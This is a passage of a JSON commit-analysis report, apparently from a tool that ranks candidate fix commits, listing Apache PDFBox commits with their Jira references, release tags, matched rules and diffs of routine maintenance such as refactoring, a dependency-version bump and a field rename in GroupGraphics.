"2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "6156337e979401441d9f7eb4ef92b1be8d0a84e9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531248757, + "hunks": 1, + "message": "PDFBOX-4184: fix heuristics git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835595 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index ddbef8dc5..561558f70 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -667,3 +667,4 @@ public final class LosslessFactory", + " {", + "- sum += aDataRawRowSub & 0xFF;", + "+ // https://www.w3.org/TR/PNG-Encoders.html#E.Filter-selection", + "+ sum += Math.abs(aDataRawRowSub);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "acb4cd5ea75f9dc3d2a3aba7c139de5034198daf" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "11061a829adc5975527d2f58dd296aa0ff33f55d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532451776, + "hunks": 3, + "message": "PDFBOX-4276: handle all ExtGState names, not just those with gs and number git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836571 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java b/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", + "index d5f549861..11986a755 100644", + "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", + "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", + "@@ -115,12 +115,9 @@ public class ExtGStateValidationProcess extends AbstractProcess", + " COSName key = (COSName) object;", + "- if (key.getName().matches(TRANSPARENCY_DICTIONARY_KEY_EXTGSTATE_ENTRY_REGEX))", + "+ COSBase gsBase = extGStates.getItem(key);", + "+ COSDictionary gsDict = COSUtils.getAsDictionary(gsBase, cosDocument);", + "+ if (gsDict == null)", + " {", + "- COSBase gsBase = extGStates.getItem(key);", + "- COSDictionary gsDict = COSUtils.getAsDictionary(gsBase, cosDocument);", + "- if (gsDict == null)", + "- {", + "- throw new ValidationException(\"The Extended Graphics State dictionary is invalid\");", + "- }", + "- listOfExtGState.add(gsDict);", + "+ throw new ValidationException(\"The Extended Graphics State dictionary is invalid\");", + " }", + "+ listOfExtGState.add(gsDict);", + " }" + ], + "changed_files": [ + "preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4276": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "184df397dc2c1b887aa505a613efd4eb9460a181" + ], + [ + "no-tag", + "077d049d0bebb70fd2f27f09b191c4517520a7bc" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4276", + "relevance": 2 + } + ] + }, + { + "commit_id": "9193e379827b2414a3db850ac6215d289493fa25", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532251756, + "hunks": 1, + "message": "PDFBOX-4184: size comparison only for DeviceRGB images git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836431 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 3b81dbe43..bebda6ce2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -85,3 +85,4 @@ public final class LosslessFactory", + " {", + "- if (pdImageXObject.getBitsPerComponent() < 16 &&", + "+ if (pdImageXObject.getColorSpace() == PDDeviceRGB.INSTANCE &&", + "+ pdImageXObject.getBitsPerComponent() < 16 &&", + " image.getWidth() * image.getHeight() <= 50 * 50)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "27381387a031eac6c3f872eb331df45edf93d6ea" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "1ba37ac4b778f6e0728ef92924c3775cc16caabf", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527004780, + "hunks": 1, + "message": "PDFBOX-4071: update owasp check to current version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832040 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 7d1ef8d71..5e35db3a0 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -148,3 +148,3 @@", + " dependency-check-maven", + "- 3.1.2", + "+ 3.2.0", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a831d2c0b474902675235c6e35e720caaf1321a1" + ], + [ + "no-tag", + "5a4c4ccd0a36db2855c67af600ac6b9485ac6308" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "901cfc3a03e8e6c72f923f523f551a22a9fc6b62", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531421953, + "hunks": 1, + "message": "PDFBOX-4071: update javadoc link git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835766 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 86b47b965..bff4a6054 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -183,3 +183,3 @@", + " ", + "- http://download.oracle.com/javase/1.7.0/docs/api/", + "+ https://docs.oracle.com/javase/7/docs/api/", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "460bb9d95e1a850f5112a90a290dff0d4d445f31" + ], + [ + "no-tag", + "0243118c3f122e13612e145948ce512da20686b9" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "e4600eef2f3b5e2b82e95a66c16eeb276f1c6997", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528393137, + "hunks": 1, + "message": "PDFBOX-4241: don't close the stream twice, as suggested by Harald Kuhr git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833132 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "index f906717e0..235ce1eab 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", + "@@ -300,6 +300,2 @@ public class COSWriter implements ICOSVisitor, Closeable", + " }", + "- if (getOutput() != null)", + "- {", + "- getOutput().close();", + "- }", + " if (incrementalOutput != null)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4241": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "63a794e583e2d6e2ab2504255cb5477d011d7300" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4241", + "relevance": 2 + } + ] + }, + { + "commit_id": "960d51d027c468f09ae011d48a018ba39efc1b8e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531331744, + "hunks": 3, + "message": "PDFBOX-4071: replace deprecated method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835654 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", + "index e344f61fb..cc1642cd6 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", + "@@ -40,3 +40,3 @@ import org.bouncycastle.asn1.x509.GeneralName;", + " import org.bouncycastle.asn1.x509.X509ObjectIdentifiers;", + "-import org.bouncycastle.x509.extension.X509ExtensionUtil;", + "+import org.bouncycastle.cert.jcajce.JcaX509ExtensionUtils;", + "@@ -138,3 +138,3 @@ public class CertInformationHelper", + " {", + "- ASN1Sequence asn1Seq = (ASN1Sequence) X509ExtensionUtil.fromExtensionValue(extensionValue);", + "+ ASN1Sequence asn1Seq = (ASN1Sequence) JcaX509ExtensionUtils.parseExtensionValue(extensionValue);", + " Enumeration objects = asn1Seq.getObjects();", + "@@ -172,3 +172,3 @@ public class CertInformationHelper", + " {", + "- ASN1Sequence asn1Seq = (ASN1Sequence) X509ExtensionUtil.fromExtensionValue(extensionValue);", + "+ ASN1Sequence asn1Seq = (ASN1Sequence) JcaX509ExtensionUtils.parseExtensionValue(extensionValue);", + " Enumeration objects = asn1Seq.getObjects();" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "25b289c050018c4855809c721e7d7127b79f24c4" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "831ca3562c73296a35ffc410a0f08d4558bf0676", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530384240, + "hunks": 75, + "message": "PDFBOX-3000: sonar fix: don't have a class member with the same name as its enclosing class; rename other member as well git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834758 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "index b21ca1e6f..d85d7db92 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "@@ -68,4 +68,4 @@ class GroupGraphics extends Graphics2D", + " private final BufferedImage groupAlphaImage;", + "- private final Graphics2D groupGraphics;", + "- private final Graphics2D alphaGraphics;", + "+ private final Graphics2D groupG2D;", + "+ private final Graphics2D alphaG2D;", + "@@ -74,6 +74,6 @@ class GroupGraphics extends Graphics2D", + " this.groupImage = groupImage;", + "- this.groupGraphics = groupGraphics;", + "+ this.groupG2D = groupGraphics;", + " this.groupAlphaImage = new BufferedImage(groupImage.getWidth(), groupImage.getHeight(),", + " BufferedImage.TYPE_INT_ARGB);", + "- this.alphaGraphics = groupAlphaImage.createGraphics();", + "+ this.alphaG2D = groupAlphaImage.createGraphics();", + " }", + "@@ -84,5 +84,5 @@ class GroupGraphics extends Graphics2D", + " this.groupImage = groupImage;", + "- this.groupGraphics = groupGraphics;", + "+ this.groupG2D = groupGraphics;", + " this.groupAlphaImage = groupAlphaImage;", + "- this.alphaGraphics = alphaGraphics;", + "+ this.alphaG2D = alphaGraphics;", + " }", + "@@ -92,4 +92,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.clearRect(x, y, width, height);", + "- alphaGraphics.clearRect(x, y, width, height);", + "+ groupG2D.clearRect(x, y, width, height);", + "+ alphaG2D.clearRect(x, y, width, height);", + " }", + "@@ -99,4 +99,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.clipRect(x, y, width, height);", + "- alphaGraphics.clipRect(x, y, width, height);", + "+ groupG2D.clipRect(x, y, width, height);", + "+ alphaG2D.clipRect(x, y, width, height);", + " }", + "@@ -106,4 +106,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.copyArea(x, y, width, height, dx, dy);", + "- alphaGraphics.copyArea(x, y, width, height, dx, dy);", + "+ groupG2D.copyArea(x, y, width, height, dx, dy);", + "+ alphaG2D.copyArea(x, y, width, height, dx, dy);", + " }", + "@@ -113,4 +113,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- Graphics g = groupGraphics.create();", + "- Graphics a = alphaGraphics.create();", + "+ Graphics g = groupG2D.create();", + "+ Graphics a = alphaG2D.create();", + " if (g instanceof Graphics2D && a instanceof Graphics2D)", + "@@ -125,4 +125,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.dispose();", + "- alphaGraphics.dispose();", + "+ groupG2D.dispose();", + "+ alphaG2D.dispose();", + " }", + "@@ -132,4 +132,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", + "- alphaGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", + "+ groupG2D.drawArc(x, y, width, height, startAngle, arcAngle);", + "+ alphaG2D.drawArc(x, y, width, height, startAngle, arcAngle);", + " }", + "@@ -139,4 +139,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, x, y, bgcolor, observer);", + "- return alphaGraphics.drawImage(img, x, y, bgcolor, observer);", + "+ groupG2D.drawImage(img, x, y, bgcolor, observer);", + "+ return alphaG2D.drawImage(img, x, y, bgcolor, observer);", + " }", + "@@ -146,4 +146,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, x, y, observer);", + "- return alphaGraphics.drawImage(img, x, y, observer);", + "+ groupG2D.drawImage(img, x, y, observer);", + "+ return alphaG2D.drawImage(img, x, y, observer);", + " }", + "@@ -154,4 +154,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", + "- return alphaGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", + "+ groupG2D.drawImage(img, x, y, width, height, bgcolor, observer);", + "+ return alphaG2D.drawImage(img, x, y, width, height, bgcolor, observer);", + " }", + "@@ -161,4 +161,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, x, y, width, height, observer);", + "- return alphaGraphics.drawImage(img, x, y, width, height, observer);", + "+ groupG2D.drawImage(img, x, y, width, height, observer);", + "+ return alphaG2D.drawImage(img, x, y, width, height, observer);", + " }", + "@@ -169,4 +169,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + "- return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + "+ groupG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + "+ return alphaG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + " }", + "@@ -177,4 +177,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + "- return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + "+ groupG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + "+ return alphaG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + " }", + "@@ -184,4 +184,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawLine(x1, y1, x2, y2);", + "- alphaGraphics.drawLine(x1, y1, x2, y2);", + "+ groupG2D.drawLine(x1, y1, x2, y2);", + "+ alphaG2D.drawLine(x1, y1, x2, y2);", + " }", + "@@ -191,4 +191,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawOval(x, y, width, height);", + "- alphaGraphics.drawOval(x, y, width, height);", + "+ groupG2D.drawOval(x, y, width, height);", + "+ alphaG2D.drawOval(x, y, width, height);", + " }", + "@@ -198,4 +198,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawPolygon(xPoints, yPoints, nPoints);", + "- alphaGraphics.drawPolygon(xPoints, yPoints, nPoints);", + "+ groupG2D.drawPolygon(xPoints, yPoints, nPoints);", + "+ alphaG2D.drawPolygon(xPoints, yPoints, nPoints);", + " }", + "@@ -205,4 +205,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawPolyline(xPoints, yPoints, nPoints);", + "- alphaGraphics.drawPolyline(xPoints, yPoints, nPoints);", + "+ groupG2D.drawPolyline(xPoints, yPoints, nPoints);", + "+ alphaG2D.drawPolyline(xPoints, yPoints, nPoints);", + " }", + "@@ -212,4 +212,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + "- alphaGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ groupG2D.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ alphaG2D.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + " }", + "@@ -219,4 +219,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawString(iterator, x, y);", + "- alphaGraphics.drawString(iterator, x, y);", + "+ groupG2D.drawString(iterator, x, y);", + "+ alphaG2D.drawString(iterator, x, y);", + " }", + "@@ -226,4 +226,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawString(str, x, y);", + "- alphaGraphics.drawString(str, x, y);", + "+ groupG2D.drawString(str, x, y);", + "+ alphaG2D.drawString(str, x, y);", + " }", + "@@ -233,4 +233,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", + "- alphaGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", + "+ groupG2D.fillArc(x, y, width, height, startAngle, arcAngle);", + "+ alphaG2D.fillArc(x, y, width, height, startAngle, arcAngle);", + " }", + "@@ -240,4 +240,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fillOval(x, y, width, height);", + "- alphaGraphics.fillOval(x, y, width, height);", + "+ groupG2D.fillOval(x, y, width, height);", + "+ alphaG2D.fillOval(x, y, width, height);", + " }", + "@@ -247,4 +247,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fillPolygon(xPoints, yPoints, nPoints);", + "- alphaGraphics.fillPolygon(xPoints, yPoints, nPoints);", + "+ groupG2D.fillPolygon(xPoints, yPoints, nPoints);", + "+ alphaG2D.fillPolygon(xPoints, yPoints, nPoints);", + " }", + "@@ -254,4 +254,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fillRect(x, y, width, height);", + "- alphaGraphics.fillRect(x, y, width, height);", + "+ groupG2D.fillRect(x, y, width, height);", + "+ alphaG2D.fillRect(x, y, width, height);", + " }", + "@@ -261,4 +261,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + "- alphaGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ groupG2D.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ alphaG2D.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + " }", + "@@ -268,3 +268,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getClip();", + "+ return groupG2D.getClip();", + " }", + "@@ -274,3 +274,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getClipBounds();", + "+ return groupG2D.getClipBounds();", + " }", + "@@ -280,3 +280,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getColor();", + "+ return groupG2D.getColor();", + " }", + "@@ -286,3 +286,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getFont();", + "+ return groupG2D.getFont();", + " }", + "@@ -292,3 +292,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getFontMetrics(f);", + "+ return groupG2D.getFontMetrics(f);", + " }", + "@@ -298,4 +298,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setClip(x, y, width, height);", + "- alphaGraphics.setClip(x, y, width, height);", + "+ groupG2D.setClip(x, y, width, height);", + "+ alphaG2D.setClip(x, y, width, height);", + " }", + "@@ -305,4 +305,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setClip(clip);", + "- alphaGraphics.setClip(clip);", + "+ groupG2D.setClip(clip);", + "+ alphaG2D.setClip(clip);", + " }", + "@@ -312,4 +312,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setColor(c);", + "- alphaGraphics.setColor(c);", + "+ groupG2D.setColor(c);", + "+ alphaG2D.setColor(c);", + " }", + "@@ -319,4 +319,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setFont(font);", + "- alphaGraphics.setFont(font);", + "+ groupG2D.setFont(font);", + "+ alphaG2D.setFont(font);", + " }", + "@@ -326,4 +326,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setPaintMode();", + "- alphaGraphics.setPaintMode();", + "+ groupG2D.setPaintMode();", + "+ alphaG2D.setPaintMode();", + " }", + "@@ -333,4 +333,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setXORMode(c1);", + "- alphaGraphics.setXORMode(c1);", + "+ groupG2D.setXORMode(c1);", + "+ alphaG2D.setXORMode(c1);", + " }", + "@@ -340,4 +340,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.translate(x, y);", + "- alphaGraphics.translate(x, y);", + "+ groupG2D.translate(x, y);", + "+ alphaG2D.translate(x, y);", + " }", + "@@ -347,4 +347,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.addRenderingHints(hints);", + "- alphaGraphics.addRenderingHints(hints);", + "+ groupG2D.addRenderingHints(hints);", + "+ alphaG2D.addRenderingHints(hints);", + " }", + "@@ -354,4 +354,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.clip(s);", + "- alphaGraphics.clip(s);", + "+ groupG2D.clip(s);", + "+ alphaG2D.clip(s);", + " }", + "@@ -361,4 +361,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.draw(s);", + "- alphaGraphics.draw(s);", + "+ groupG2D.draw(s);", + "+ alphaG2D.draw(s);", + " }", + "@@ -368,4 +368,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawGlyphVector(g, x, y);", + "- alphaGraphics.drawGlyphVector(g, x, y);", + "+ groupG2D.drawGlyphVector(g, x, y);", + "+ alphaG2D.drawGlyphVector(g, x, y);", + " }", + "@@ -375,4 +375,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, op, x, y);", + "- alphaGraphics.drawImage(img, op, x, y);", + "+ groupG2D.drawImage(img, op, x, y);", + "+ alphaG2D.drawImage(img, op, x, y);", + " }", + "@@ -382,4 +382,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawImage(img, xform, obs);", + "- return alphaGraphics.drawImage(img, xform, obs);", + "+ groupG2D.drawImage(img, xform, obs);", + "+ return alphaG2D.drawImage(img, xform, obs);", + " }", + "@@ -389,4 +389,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawRenderableImage(img, xform);", + "- alphaGraphics.drawRenderableImage(img, xform);", + "+ groupG2D.drawRenderableImage(img, xform);", + "+ alphaG2D.drawRenderableImage(img, xform);", + " }", + "@@ -396,4 +396,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawRenderedImage(img, xform);", + "- alphaGraphics.drawRenderedImage(img, xform);", + "+ groupG2D.drawRenderedImage(img, xform);", + "+ alphaG2D.drawRenderedImage(img, xform);", + " }", + "@@ -403,4 +403,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawString(iterator, x, y);", + "- alphaGraphics.drawString(iterator, x, y);", + "+ groupG2D.drawString(iterator, x, y);", + "+ alphaG2D.drawString(iterator, x, y);", + " }", + "@@ -410,4 +410,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.drawString(str, x, y);", + "- alphaGraphics.drawString(str, x, y);", + "+ groupG2D.drawString(str, x, y);", + "+ alphaG2D.drawString(str, x, y);", + " }", + "@@ -417,4 +417,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.fill(s);", + "- alphaGraphics.fill(s);", + "+ groupG2D.fill(s);", + "+ alphaG2D.fill(s);", + " }", + "@@ -424,3 +424,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getBackground();", + "+ return groupG2D.getBackground();", + " }", + "@@ -430,3 +430,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getComposite();", + "+ return groupG2D.getComposite();", + " }", + "@@ -436,3 +436,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getDeviceConfiguration();", + "+ return groupG2D.getDeviceConfiguration();", + " }", + "@@ -442,3 +442,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getFontRenderContext();", + "+ return groupG2D.getFontRenderContext();", + " }", + "@@ -448,3 +448,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getPaint();", + "+ return groupG2D.getPaint();", + " }", + "@@ -454,3 +454,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getRenderingHint(hintKey);", + "+ return groupG2D.getRenderingHint(hintKey);", + " }", + "@@ -460,3 +460,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return 